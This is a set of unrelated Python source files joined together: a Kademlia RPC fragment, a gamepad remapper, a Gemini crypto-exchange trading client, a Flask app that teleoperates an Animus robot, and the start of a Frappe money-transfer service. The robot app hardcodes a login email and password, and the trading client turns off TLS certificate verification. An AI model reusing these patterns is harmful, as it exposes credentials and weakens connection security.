result, peer_time = self.exposed_ping(self.my_contact.to_json(), self.lamport)
else:
connection = self.connect(contact)
result, peer_time = connection.root.ping(self.my_contact.to_json(), self.lamport)
self.update_lamport(peer_time)
return result
@try_function()
def store_to(self, contact: Contact, key: int, value: str, store_time: int) -> bool:
debug(f'KademliaService.store_to - Trying store to contact: {contact} for key: {key}.')
result, peer_time = None, None
if self.my_contact == contact:
result, peer_time = self.exposed_store(self.my_contact.to_json(), self.lamport, key, value, store_time)
else:
connection = self.connect(contact)
result, peer_time = connection.root.store(self.my_contact.to_json(), self.lamport, key, value, store_time)
self.update_lamport(peer_time)
return result
@try_function()
def find_node_to(self, contact: Contact, id: int) -> list:
debug(f'KademliaService.find_node_to - Trying find_node to contact: {contact} for id: {id}')
result, peer_time = None, None
if self.my_contact == contact:
result, peer_time = self.exposed_find_node(self.my_contact.to_json(), self.lamport, id)
else:
connection = self.connect(contact)
result, peer_time = connection.root.find_node(self.my_contact.to_json(), self.lamport, id)
self.update_lamport(peer_time)
return result
@try_function()
def find_value_to(self, contact: Contact, key: int) -> object:
debug(f'KademliaService.find_node_to - Trying find_value to contact: {contact} for key: {key}')
result, peer_time = None, None
if self.my_contact == contact:
result, peer_time = self.exposed_find_value(self.my_contact.to_json(), self.lamport, key)
else:
connection = self.connect(contact)
result, peer_time = connection.root.find_value(self.my_contact.to_json(), self.lamport, key)
self.update_lamport(peer_time)
return result
|
gamepad-remapper.py
|
#!/usr/bin/python3 -u
import nativemessaging as nm
import os
import threading
import subprocess
import sys
import json
import pyautogui
# prevent pygame from printing and breaking nativemessaging
os.environ["PYGAME_HIDE_SUPPORT_PROMPT"] = ""
import pygame
dirs = {"neg": -1, "pos": 1}
axes = {"x": 0, "y": 1}
def sendKeyPress(key):
# send keypresses
# hotkey if provided a list of keys, single press if only provided one
if type(key) is list:
pyautogui.hotkey(*key)
else:
pyautogui.press(str(key))
def mapping(stop=None, map={}):
# provide nessecary objects if ommitted
if "buttons" not in map:
map["buttons"] = {}
if "axes" not in map:
map["axes"] = {}
if "hats" not in map:
map["hats"] = {}
pygame.joystick.init()
pygame.display.init()
clock = pygame.time.Clock()
# init joystick
try:
js = pygame.joystick.Joystick(0)
js.init()
except pygame.error:
stop.wait()
# while extension hasn't send stop message
while stop is None or not stop.is_set():
# use events for single button presses
for event in pygame.event.get():
if event.type == pygame.JOYBUTTONDOWN:
id = str(event.button)
if id in map["buttons"] and map["buttons"][id][1] == "single":
if js.get_button(event.button) == 1:
sendKeyPress(map["buttons"][id][0])
if event.type == pygame.JOYAXISMOTION:
id = str(event.axis)
if id in map["axes"]:
for dir in map["axes"][id].keys():
if map["axes"][id][dir][1] == "single":
if round(event.value) == dirs[dir] and abs(round(event.value) - event.value) <= .001:
sendKeyPress(map["axes"][id][dir][0])
if event.type == pygame.JOYHATMOTION:
id = str(event.hat)
if id in map["hats"]:
for axis in map["hats"][id]:
for dir in map["hats"][id][axis]:
if map["hats"][id][axis][dir][1] == "single":
if event.value[axes[axis]] == dirs[dir]:
sendKeyPress(map["hats"][id][axis][dir][0])
# use loop for repeating
for button in map["buttons"].keys():
if map["buttons"][button][1] == "repeat":
if js.get_button(int(button)) == 1:
sendKeyPress(map["buttons"][button][0])
for axis in map["axes"].keys():
for dir in map["axes"][axis]:
if map["axes"][axis][dir][1] == "repeat":
if round(js.get_axis(int(axis))) == dirs[dir]:
sendKeyPress(map["axes"][axis][dir][0])
for hat in map["hats"].keys():
for axis in map["hats"][hat]:
for dir in map["hats"][hat][axis]:
if map["hats"][hat][axis][dir][1] == "repeat":
if js.get_hat(int(hat))[axes[axis]] == dirs[dir]:
sendKeyPress(map["hats"][hat][axis][dir][0])
clock.tick(60)
if __name__ == "__main__":
# gamepad-remapper@r01 is sent as an arg if run by browser
if "gamepad-remapper@r01" in sys.argv:
gvars = {}
while True:
# wait for message from browser
message = nm.get_message()
if message["action"] == "start":
# create kill variable
gvars["kill"] = threading.Event()
# start mapping using threading (so that the loop works while still waiting for messages from browser)
gvars["t"] = threading.Thread(target=mapping, args=(gvars["kill"], message["config"]))
gvars["t"].start()
# send state and mode variables to browser
nm.send_message(nm.encode_message({"state": "started", "mode": message["config"]["name"]}))
elif message["action"] == "stop":
# activate kill variable
gvars["kill"].set()
gvars["t"].join()
# send state and mode variables to browser
nm.send_message(nm.encode_message({"state": "stopped", "mode": None}))
elif message["action"] == "tester":
# open tester, piping stdout to /dev/null (otherwise breaks nativemessaging)
with open(os.devnull, "w") as fp:
subprocess.Popen("./test.py", stdout=fp)
nm.send_message(nm.encode_message("LAUNCHED TEST"))
else:
print("GAMEPAD REMAPPER")
# if file in args, otherwise ask for file
if len(sys.argv) > 1 and os.path.isfile(sys.argv[1]):
with open(sys.argv[1], "r") as f:
map = json.loads(f.read())
else:
file = input("Please provide a config file: ")
with open(file, "r") as f:
map = json.loads(f.read())
# print configs, choose which to use
keys = []
for key in map:
keys.append(key["name"])
print(" " + key["name"])
config = input("Choose your config: ")
# start mapping
mapping(None, map[keys.index(config)])
|
gemini.py
|
import asyncio
import base64
import hashlib
import hmac
import json
import os
import queue
import ssl
import time
import traceback
from datetime import date, datetime, timedelta
from threading import Thread
from typing import Dict, List, Optional, Tuple
import pandas as pd
import requests
import websocket
from pytz import timezone
from liualgotrader.common import config
from liualgotrader.common.assets import get_asset_min_qty, round_asset
from liualgotrader.common.tlog import tlog
from liualgotrader.common.types import Order, QueueMapper, ThreadFlags, Trade
from liualgotrader.trading.base import Trader
utctz = timezone("UTC")
class GeminiTrader(Trader):
gemini_api_key: Optional[str] = os.getenv("GEMINI_API_KEY")
gemini_api_secret: Optional[str] = os.getenv("GEMINI_API_SECRET")
base_url = "https://api.sandbox.gemini.com"
base_websocket = "wss://api.sandbox.gemini.com"
last_nonce = None
def __init__(self, qm: QueueMapper = None):
self.running_task: Optional[Thread] = None
self.hb_task: Optional[Thread] = None
self.send_hb = True
self.ws = None
self.flags: Optional[ThreadFlags] = None
super().__init__(qm)
@classmethod
def _generate_request_headers(cls, payload: Dict) -> Dict:
if not cls.gemini_api_secret or not cls.gemini_api_key:
raise AssertionError(
"both env variables GEMINI_API_KEY and GEMINI_API_SECRET must be set up"
)
t = datetime.now()
payload_nonce = int(time.mktime(t.timetuple()) * 1000)
if cls.last_nonce and cls.last_nonce == payload_nonce:
payload_nonce += 1
cls.last_nonce = payload_nonce
payload["nonce"] = str(payload_nonce)
encoded_payload = json.dumps(payload).encode()
b64 = base64.b64encode(encoded_payload)
signature = hmac.new(
cls.gemini_api_secret.encode(), b64, hashlib.sha384
).hexdigest()
return {
"Content-Type": "text/plain",
"Content-Length": "0",
"X-GEMINI-APIKEY": cls.gemini_api_key,
"X-GEMINI-PAYLOAD": b64,
"X-GEMINI-SIGNATURE": signature,
"Cache-Control": "no-cache",
}
def _generate_ws_headers(self, payload: Dict) -> Dict:
if not self.gemini_api_secret or not self.gemini_api_key:
raise AssertionError(
"both env variables GEMINI_API_KEY and GEMINI_API_SECRET must be set up"
)
t = datetime.now()
payload_nonce = str(int(time.mktime(t.timetuple()) * 1000))
payload["nonce"] = payload_nonce
encoded_payload = json.dumps(payload).encode()
b64 = base64.b64encode(encoded_payload)
signature = hmac.new(
self.gemini_api_secret.encode(), b64, hashlib.sha384
).hexdigest()
return {
"X-GEMINI-APIKEY": self.gemini_api_key,
"X-GEMINI-PAYLOAD": b64.decode(),
"X-GEMINI-SIGNATURE": signature,
}
@classmethod
def _get_order_event_type(cls, order_data: Dict) -> Order.EventType:
return (
Order.EventType.canceled
if order_data["is_cancelled"] == True
else Order.EventType.fill
if order_data["remaining_amount"] == "0"
else Order.EventType.partial_fill
)
@classmethod
def _get_trade_event_type(cls, trade_data: Dict) -> Order.EventType:
return (
Order.EventType.canceled
if trade_data["type"] == "cancelled"
else Order.EventType.rejected
if trade_data["type"] == "rejected"
else Order.EventType.canceled
if trade_data["type"] == "cancel_rejected"
else Order.EventType.fill
if trade_data["remaining_amount"] == "0"
else Order.EventType.partial_fill
)
@classmethod
def _get_order_side(cls, order_data: Dict) -> Order.FillSide:
return (
Order.FillSide.buy
if order_data["side"] == "buy"
else Order.FillSide.sell
)
@classmethod
def _order_from_dict(cls, order_data: Dict) -> Order:
trades = order_data.get("trades", [])
trade_fees: float = 0.0 + sum(float(t["fee_amount"]) for t in trades)
return Order(
order_id=order_data["order_id"],
symbol=order_data["symbol"].lower(),
filled_qty=float(order_data["executed_amount"]),
event=cls._get_order_event_type(order_data),
price=float(order_data["price"]),
side=cls._get_order_side(order_data),
submitted_at=pd.Timestamp(
ts_input=order_data["timestampms"], unit="ms", tz="UTC"
),
avg_execution_price=float(order_data["avg_execution_price"]),
remaining_amount=float(order_data["remaining_amount"]),
trade_fees=trade_fees,
)
@classmethod
def _trade_from_dict(cls, trade_dict: Dict) -> Trade:
tlog(f"GEMINI GOING TO SEND {trade_dict}")
return Trade(
order_id=trade_dict["order_id"],
symbol=trade_dict["symbol"].lower(),
event=cls._get_trade_event_type(trade_dict),
filled_qty=float(trade_dict["fill"]["amount"])
if "fill" in trade_dict
else 0.0,
trade_fee=float(
trade_dict["fill"]["fee"] if "fill" in trade_dict else 0.0
)
if "fill" in trade_dict
else 0.0,
filled_avg_price=float(trade_dict["avg_execution_price"] or 0.0),
liquidity=trade_dict["fill"]["liquidity"]
if "fill" in trade_dict
else "",
updated_at=pd.Timestamp(
ts_input=trade_dict["timestampms"], unit="ms", tz="UTC"
),
side=Order.FillSide[trade_dict["side"]],
)
async def is_fractionable(self, symbol: str) -> bool:
return True
def check_error(self, result: Dict):
if result.get("result") == "error":
raise AssertionError(
f"[EXCEPTION] {result['reason']}:{result['message']}"
)
async def is_order_completed(
self, order_id: str, external_order_id: Optional[str] = None
) -> Tuple[Order.EventType, float, float, float]:
order = await self.get_order(order_id)
return (
order.event,
order.avg_execution_price,
order.filled_qty,
order.trade_fees,
)
def get_market_schedule(
self,
) -> Tuple[Optional[datetime], Optional[datetime]]:
return (
datetime.today().replace(
hour=0, minute=0, second=0, microsecond=0, tzinfo=utctz
),
datetime.today().replace(
hour=23, minute=59, second=59, microsecond=0, tzinfo=utctz
),
)
def get_trading_days(
self, start_date: date, end_date: date = date.today()
) -> pd.DataFrame:
return pd.DataFrame(
index=pd.date_range(start=start_date, end=end_date)
)
def get_position(self, symbol: str) -> float:
symbol = symbol.lower()
endpoint = "/v1/balances"
url = self.base_url + endpoint
payload = {
"request": endpoint,
}
headers = self._generate_request_headers(payload)
response = requests.post(url, data=None, headers=headers)
if response.status_code == 200:
for b in response.json():
if b["currency"] == symbol:
return float(b["amount"])
return 0.0
raise AssertionError(
f"HTTP ERROR {response.status_code} {response.text}"
)
async def get_order(
self, order_id: str, client_order_id: Optional[str] = None
) -> Order:
endpoint = "/v1/order/status"
url = self.base_url + endpoint
payload = {
"request": endpoint,
"order_id": order_id,
"include_trades": True,
}
headers = self._generate_request_headers(payload)
response = requests.post(url, data=None, headers=headers)
if response.status_code == 200:
order_data = response.json()
self.check_error(order_data)
return self._order_from_dict(order_data)
raise AssertionError(
f"HTTP ERROR {response.status_code} {response.text}"
)
def is_market_open_today(self) -> bool:
return True
def get_time_market_close(self) -> Optional[timedelta]:
return datetime.today().replace(
hour=23, minute=59, second=59, microsecond=0, tzinfo=utctz
) - datetime.now().replace(tzinfo=utctz)
async def reconnect(self):
await self.close()
await self.run()
@classmethod
def heartbeat(cls, flags: ThreadFlags):
tlog("GEMINI HEARTBEAT thread starting")
while flags.run:
tlog("GEMINI HEARTBEAT")
endpoint = "/v1/heartbeat"
url = cls.base_url + endpoint
payload = {
"request": endpoint,
}
headers = cls._generate_request_headers(payload)
response = requests.post(url, data=None, headers=headers)
if response.status_code != 200:
raise AssertionError(
f"HEARTHBEAT HTTP ERROR {response.status_code} {response.text}"
)
time.sleep(20)
tlog("GEMINI HEARTBEAT thread terminated")
@classmethod
def on_message(cls, ws, msgs):
msgs = json.loads(msgs)
if type(msgs) != list:
return
for msg in msgs:
if msg["type"] in [
"fill",
"cancel_rejected",
"cancelled",
"rejected",
]:
trade = cls._trade_from_dict(msg)
tlog(f"GEMINI TRADING UPDATE:{trade}")
to_send = {
"EV": "trade_update",
"symbol": trade.symbol.lower(),
"trade": trade.__dict__,
}
try:
qs = cls.get_instance().queues
if qs:
for q in qs.get_allqueues():
q.put(to_send, timeout=1)
except queue.Full as f:
tlog(
f"[EXCEPTION] process_message(): queue for {symbol} is FULL:{f}, sleeping for 2 seconds and re-trying."
)
raise
@classmethod
def on_error(cls, ws, error):
tlog(f"[ERROR] GeminiTrader {error}")
@classmethod
def on_close(cls, ws, close_status_code, close_msg):
tlog(f"on_close(): status={close_status_code}, close_msg={close_msg}")
async def run(self):
if not self.running_task:
tlog("starting Gemini listener")
endpoint = "/v1/order/events"
payload = {"request": endpoint}
headers = self._generate_ws_headers(payload)
self.ws = websocket.WebSocketApp(
f"{self.base_websocket}{endpoint}?eventTypeFilter=cancel_rejected&eventTypeFilter=cancelled&eventTypeFilter=rejected&eventTypeFilter=fill&eventTypeFilter=closed&heartbeat=true",
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close,
header=headers,
)
self.running_task = Thread(
target=self.ws.run_forever,
args=(None, {"cert_reqs": ssl.CERT_NONE}),
)
self.flags = ThreadFlags(run=True)
self.hb_task = Thread(target=self.heartbeat, args=(self.flags,))
self.running_task.start()
self.hb_task.start()
return self.running_task
async def close(self):
if self.running_task and self.running_task.is_alive():
tlog(f"close task {self.running_task}")
self.ws.keep_running = False
self.flags.run = False
self.running_task.join()
self.hb_task.join()
tlog("task terminated")
self.ws = None
self.running_task = None
self.hb_task = None
self.flags = None
async def get_tradeable_symbols(self) -> List[str]:
endpoint = "/v1/symbols"
url = self.base_url + endpoint
response = requests.get(url)
if response.status_code == 200:
return response.json()
raise AssertionError(
f"HTTP ERROR {response.status_code} {response.text}"
)
async def get_shortable_symbols(self) -> List[str]:
return []
async def is_shortable(self, symbol) -> bool:
return False
async def cancel_order(self, order: Order) -> bool:
endpoint = "/v1/order/cancel"
url = self.base_url + endpoint
payload = {"request": endpoint, "order_id": order.order_id}
headers = self._generate_request_headers(payload)
response = requests.post(url, data=None, headers=headers)
if response.status_code == 200:
order_status = response.json()
self.check_error(order_status)
return order_status
raise AssertionError(
f"HTTP ERROR {response.status_code} {response.text}"
)
async def submit_order(
self,
symbol: str,
qty: float,
side: str,
order_type: str,
time_in_force: str = None,
limit_price: str = None,
stop_price: str = None,
client_order_id: str = None,
extended_hours: bool = None,
order_class: str = None,
take_profit: dict = None,
stop_loss: dict = None,
trail_price: str = None,
trail_percent: str = None,
on_behalf_of: str = None,
) -> Order:
symbol = symbol.lower()
if order_type == "market":
raise AssertionError(
"GEMINI does not support market orders, use limit orders"
)
if float(qty) < get_asset_min_qty(symbol):
raise AssertionError(
f"GEMINI requested quantity of {qty} is below minimum for {symbol}"
)
endpoint = "/v1/order/new"
url = self.base_url + endpoint
qty = round_asset(symbol, float(qty))
payload = {
"request": endpoint,
"symbol": symbol,
"amount": str(qty),
"price": str(limit_price)
if order_type == "limit"
else str(60000.0 * qty),
"side": side,
"type": "exchange limit",
"client_order_id": client_order_id,
"options": ["immediate-or-cancel"]
if order_type == "market"
else [],
}
headers = self._generate_request_headers(payload)
response = requests.post(url, data=None, headers=headers)
if response.status_code == 200:
new_order = response.json()
self.check_error(new_order)
return self._order_from_dict(new_order)
if self.flags:
self.flags.run = False
await self.close()
raise AssertionError(
f"HTTP ERROR {response.status_code} {response.text}"
)
|
appt.py
|
from flask import Flask, render_template, Response, request, abort, jsonify
import cv2
from flask_cors import CORS
import os
import animus_client as animus
import animus_utils as utils
import sys
import logging
import numpy as np
import atexit
import time
import threading
import socketio
import simplejpeg
stopFlag = False
from dotenv import load_dotenv
load_dotenv()
sio = socketio.Client()
sio.connect('http://localhost:9000')
# if(sio.connected):
# print("*****************YES*****************")
# else:
# print("*****************NO*******************")
app = Flask (__name__)
CORS(app)
class AnimusRobot:
def __init__(self):
self.log = utils.create_logger("MyAnimusApp", logging.INFO)
self.myrobot = {}
self.videoImgSrc=''
self.getRobot()
self.openModalities()
self.utils = utils
self.prevTime = 0
self.prev_motor_dict = utils.get_motor_dict()
self.head_motion_counter = {
'head_up_down': 0, # -head_angle_threshold,head_angle_threshold
'head_left_right': 0, # -head_angle_threshold,head_angle_threshold
'head_roll': 0
}
self.head_angle_incrementer = 5
self.head_angle_threshold = 90
self.body_rotation_speed=3
self.prevNavKey='nullmotion'
# self.getVideofeed()
self.thread=threading.Thread(target=self.gen_frames)
def openModalities(self):
open_success = self.myrobot.open_modality("vision")
if not open_success:
self.log.error("Could not open robot vision modality")
# sys.exit(-1)
open_success = self.myrobot.open_modality("motor")
if not open_success:
self.log.error("Could not open robot motor modality")
# sys.exit(-1)
open_success = self.myrobot.open_modality("speech")
if not open_success:
self.log.error("Could not open robot speech modality")
# sys.exit(-1)
open_success = self.myrobot.open_modality("emotion")
if not open_success:
self.log.error("Could not open robot speech modality")
# sys.exit(-1)
def getRobot(self):
for i in range(10):
self.log.info(animus.version())
# print(animus.version())
audio_params = utils.AudioParams(
Backends=["notinternal"],
SampleRate=16000,
Channels=1,
SizeInFrames=True,
TransmitRate=30
)
setup_result = animus.setup(audio_params, "PythonAnimusBasics", True)
if not setup_result.success:
time.sleep(5)
continue
login_result = animus.login_user("ms414@hw.ac.uk", "C3):]RR[Rs$Y", False)
if login_result.success:
self.log.info("Logged in")
else:
time.sleep(5)
continue
get_robots_result = animus.get_robots(True, True, False)
# print(get_robots_result)
if not get_robots_result.localSearchError.success:
self.log.error(get_robots_result.localSearchError.description)
if not get_robots_result.remoteSearchError.success:
self.log.error(get_robots_result.remoteSearchError.description)
if len(get_robots_result.robots) == 0:
self.log.info("No Robots found")
animus.close_client_interface()
time.sleep(5)
continue
chosen_robot_details = get_robots_result.robots[0]
self.myrobot = animus.Robot(chosen_robot_details)
connected_result = self.myrobot.connect()
if not connected_result.success:
print("Could not connect with robot {}".format(self.myrobot.robot_details.robot_id))
animus.close_client_interface()
time.sleep(5)
continue
else:
break
def fixImage(self,img):
bgr = img[:,:,0:3]
# convert to HSV
hsv = cv2.cvtColor(bgr, cv2.COLOR_BGR2HSV)
h,s,v = cv2.split(hsv)
purple = 120
green = 25
diff_color = green - purple
hnew = np.mod(h + diff_color, 180).astype(np.uint8)
# snew = np.mod(s-2,180).astype(np.uint8)
hsv_new = cv2.merge([hnew,s,v])
bgr_new = cv2.cvtColor(hsv_new, cv2.COLOR_HSV2BGR)
return bgr_new
def gen_frames(self): # generate frame by frame from camera
try:
while True:
try:
image_list, err = self.myrobot.get_modality("vision", True)
except:
continue
if err.success:
# clear_img=self.fixImage(image_list[0].image)
# ret, buffer = cv2.imencode('.jpg', clear_img)
# # ret, buffer = cv2.imencode('.jpg', image_list[0].image)
# frame = buffer.tobytes()
frame=simplejpeg.encode_jpeg(image_list[0].image,colorspace='BGR')
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n') # concat frame one by one and show result
# print("frame")
time.sleep(0.001)
# frame = buffer.tobytes()
# self.videoImgSrc=b'--frame\r\n Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n'
# yield(self.videoImgSrc)
except KeyboardInterrupt:
# cv2.destroyAllWindows()
self.log.info("Closing down")
# self.myrobot.disconnect()
# animus.close_client_interface()
# sys.exit(-1)
except SystemExit:
# cv2.destroyAllWindows()
self.log.info("Closing down")
# self.myrobot.disconnect()
# animus.close_client_interface()
# sys.exit(-1)
def closeRobot(self,user):
# self.myrobot.disconnect()
# animus.close_client_interface()
print(user)
cv2.destroyAllWindows()
self.log.info("Closing down")
self.myrobot.disconnect()
animus.close_client_interface()
sys.exit(-1)
Robot=AnimusRobot()
atexit.register(Robot.closeRobot, user='Reiner Braun')
@app.route('/',methods=['POST','GET'])
def index():
"""Video streaming home page."""
if(request.method=='POST'):
data=request.get_json()
# print(data)
if(data['email']==os.getenv('EMAIL') and data['password']==os.getenv('PASSWORD')):
return render_template('index.html'), 200
else:
abort(401, description="Unauthorized")
# app.route('/stop')
# return render_template('stop.html')
else:
# Robot.camera.release()
# abort(401, description="Unauthorized")
return render_template('index.html'), 200
@app.errorhandler(401)
def resource_not_found(e):
return jsonify(error=str(e)), 401
@app.route('/stop')
def stop():
Robot.closeRobot()
return render_template('stop.html')
@app.route('/start')
def start():
Robot.getRobot()
return render_template('index.html')
@app.route('/video_feed')
def video_feed():
# if(Robot.thread.is_alive()==False):
# Robot.thread.start()
#Video streaming route. Put this in the src attribute of an img tag
return Response(Robot.gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')
@sio.event
def connect():
print('connected to server')
@sio.event
def disconnect():
print('disconnected from server')
def resetRobotHead():
# Robot.prev_motor_dict["head_up_down"]=0
# Robot.head_motion_counter['head_up_down']=0
Robot.head_motion_counter['head_left_right']=0
Robot.prev_motor_dict["head_left_right"]=0
Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# if(Robot.prev_motor_dict['head_up_down']>0):
# for i in range(abs(Robot.head_motion_counter['head_up_down'])):
# Robot.head_motion_counter['head_up_down'] = Robot.head_motion_counter['head_up_down'] - 1
# Robot.prev_motor_dict["head_up_down"] = Robot.head_motion_counter['head_up_down'] * Robot.utils.HEAD_UP
# ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# time.sleep(0.02)
# # Robot.prev_motor_dict['head_up_down']=0
# elif(Robot.prev_motor_dict['head_up_down']<0):
# for i in range(abs(Robot.head_motion_counter['head_up_down'])):
# Robot.head_motion_counter['head_up_down'] = Robot.head_motion_counter['head_up_down'] + 1
# Robot.prev_motor_dict["head_up_down"] = Robot.head_motion_counter['head_up_down'] * Robot.utils.HEAD_UP
# ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# time.sleep(0.02)
# if(Robot.prev_motor_dict['head_left_right']>0):
# for i in range(abs(Robot.head_motion_counter['head_left_right'])):
# Robot.head_motion_counter['head_left_right'] = Robot.head_motion_counter['head_left_right'] - 1
# Robot.prev_motor_dict["head_left_right"] = Robot.head_motion_counter['head_left_right'] * Robot.utils.HEAD_RIGHT
# ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# time.sleep(0.02)
# # Robot.prev_motor_dict['head_up_down']=0
# elif(Robot.prev_motor_dict['head_left_right']<0):
# for i in range(abs(Robot.head_motion_counter['head_left_right'])):
# Robot.head_motion_counter['head_left_right'] = Robot.head_motion_counter['head_left_right'] + 1
# Robot.prev_motor_dict["head_left_right"] = Robot.head_motion_counter['head_left_right'] * Robot.utils.HEAD_RIGHT
# ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# time.sleep(0.02)
@sio.on('FROMNODEAPI')
def frontenddata(data):
if not (Robot.myrobot == None):
key = str(data)
# list_of_motions=[]
# motorDict = Robot.utils.get_motor_dict()
# list_of_motions = [motorDict.copy()]
if(key == 'head_up'):
if not (Robot.head_motion_counter['head_up_down'] == Robot.head_angle_threshold):
for i in range(Robot.head_angle_incrementer):
Robot.head_motion_counter['head_up_down'] = Robot.head_motion_counter['head_up_down'] + 1
Robot.prev_motor_dict["head_up_down"] = Robot.head_motion_counter['head_up_down'] * Robot.utils.HEAD_UP
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
time.sleep(0.02)
# sio.emit("sendHeadMovement","up")
elif(key == 'head_down'):
if not (Robot.head_motion_counter['head_up_down'] == -1*Robot.head_angle_threshold):
for i in range(Robot.head_angle_incrementer):
Robot.head_motion_counter['head_up_down'] = Robot.head_motion_counter['head_up_down'] - 1
Robot.prev_motor_dict["head_up_down"] = Robot.head_motion_counter['head_up_down'] * Robot.utils.HEAD_UP
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
time.sleep(0.02)
# sio.emit("sendHeadMovement","down")
elif(key == 'head_left'):
if not (Robot.head_motion_counter['head_left_right'] == -1*Robot.head_angle_threshold):
for i in range(Robot.head_angle_incrementer):
Robot.head_motion_counter['head_left_right'] = Robot.head_motion_counter['head_left_right'] - 1
Robot.prev_motor_dict["head_left_right"] = Robot.head_motion_counter['head_left_right'] * Robot.utils.HEAD_RIGHT
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
time.sleep(0.02)
# sio.emit("sendHeadMovement","left")
elif(key == 'head_right'):
if not (Robot.head_motion_counter['head_left_right'] == Robot.head_angle_threshold):
for i in range(Robot.head_angle_incrementer):
Robot.head_motion_counter['head_left_right'] = Robot.head_motion_counter['head_left_right'] + 1
Robot.prev_motor_dict["head_left_right"] = Robot.head_motion_counter['head_left_right'] * Robot.utils.HEAD_RIGHT
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
time.sleep(0.02)
# sio.emit("sendHeadMovement","right")
elif(key == 'rotate_left'):
resetRobotHead()
Robot.prev_motor_dict["body_rotate"] = Robot.body_rotation_speed
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'rotate_right'):
resetRobotHead()
Robot.prev_motor_dict["body_rotate"] = -Robot.body_rotation_speed
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'nullmotion' and Robot.prevNavKey!='nullmotion'):
Robot.prev_motor_dict["body_forward"] = 0.0
Robot.prev_motor_dict["body_sideways"] = 0.0
Robot.prev_motor_dict["body_rotate"] = 0.0
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'forward'):
resetRobotHead()
Robot.prev_motor_dict["body_forward"] = 1.0
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'left'):
resetRobotHead()
Robot.prev_motor_dict["body_sideways"] = 1.0
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'back'):
resetRobotHead()
Robot.prev_motor_dict["body_forward"] = -1.0
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
elif(key == 'right'):
resetRobotHead()
Robot.prev_motor_dict["body_sideways"] = -1.0
ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# sio.emit("sendHeadMovement","reset")
print(key)
Robot.prevNavKey=key
time.sleep(0.002)
# ret = Robot.myrobot.set_modality("motor", list(Robot.prev_motor_dict.values()))
# for motion_counter in range(len(list_of_motions)):
# ret = Robot.myrobot.set_modality("motor", list(list_of_motions[motion_counter].values()))
@sio.on('FROMNODESPEECHAPI')
def frontendspeechdata(data):
if not (Robot.myrobot == None):
speech = str(data)
print(speech)
if not(speech.lower().find("oh,")==-1):
Robot.myrobot.set_modality("emotion", "surprised")
elif(speech.lower().find("reading?")==-1):
Robot.myrobot.set_modality("emotion", "neutral")
elif(speech.lower().find("thank you for your patience")==-1):
Robot.myrobot.set_modality("emotion", "happy")
ret = Robot.myrobot.set_modality(
"speech", speech)
#pychace
# for motion_counter in range(len(list_of_motions)):
# ret = Robot.myrobot.set_modality("motor", list(list_of_motions[motion_counter].values()))
if __name__ == '__main__':
# print(os.getenv('EMAIL'))
app.run(debug=False,host=os.getenv('HOST'),port=os.getenv('PORT'))
|
YIBInfoService.py
|
from math import exp
import sys
import frappe
import threading
from frappe.database.database import enqueue_jobs_after_commit
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
from money_transfer.money_transfer.service.utils import background, get_service_files_names
from money_transfer.money_transfer.service.xml_handler import create_push_status_xml_doc, read_push_status_xml, read_status_xml, save_xml, read_xml_verification, create_verification_res_xml, get_xml_response, read_xml_payment, create_payment_res_xml, save_xml_prtfy, create_status_res_xml
from money_transfer.money_transfer.service.db import save_status_file_db, get_payment_status_data, get_psh_status_flg, get_status_data, save_payment_file_db, update_psh_status, update_status_flg, validate_req_bank, validate_account_type, save_verification_file_db, update_timer_flg, get_payment_status_flgs, get_fees_data, update_payment_fees_data
from money_transfer.money_transfer.service.socket_handler import get_customer_details, make_payment_for_customer
from money_transfer.money_transfer.db import get_table_serial_key
from money_transfer.money_transfer.xml_handler import create_fees_xml_doc, read_xml_fees_data
from money_transfer.money_transfer.utils import get_current_site_name, console_print
import money_transfer.money_transfer.service.const as const
from frappe.utils.background_jobs import enqueue, get_queue
import time
import json
@frappe.whitelist(allow_guest=True)
def Verification():
# Get All Files Names & Paths
req_file_name, res_file_name, req_xml_path, res_xml_path, site_name, private_path, req_path, res_path = get_service_files_names('Verification', 'VerificationFileSerIn')
if frappe.request.data:
req_xml = frappe.request.data
# Save Request Xml File to Server
save_xml_prtfy(req_xml_path, req_xml)
res_xml, doc_name = validate_verification_request(req_xml)
# Save Request Xml File to Database
save_verification_file_db(site_name, req_file_name, req_xml_path, private_path, req_path, doc_name)
else:
res_xml, doc_name = create_verification_res_xml(" ", " ", const.BANK_HEADER_NAME, " ", const.FP_HEADER, " ", " ", " ", " ", " ", " ", "false", const.TECHNICAL_ERROR, " ", " ", 1)
# Save Response Xml File to Server & Database
save_xml(res_xml_path, res_xml)
save_verification_file_db(site_name, res_file_name, res_xml_path, private_path, res_path, doc_name)
# Get Response Data
response = get_xml_response(res_xml)
return response
@frappe.whitelist(allow_guest=True)
def Payment():
# Get All Files Names & Paths
req_file_name, res_file_name, req_xml_path, res_xml_path, site_name, private_path, req_path, res_path = get_service_files_names('Payment', 'PaymentFileSerIn')
if frappe.request.data:
req_xml = frappe.request.data
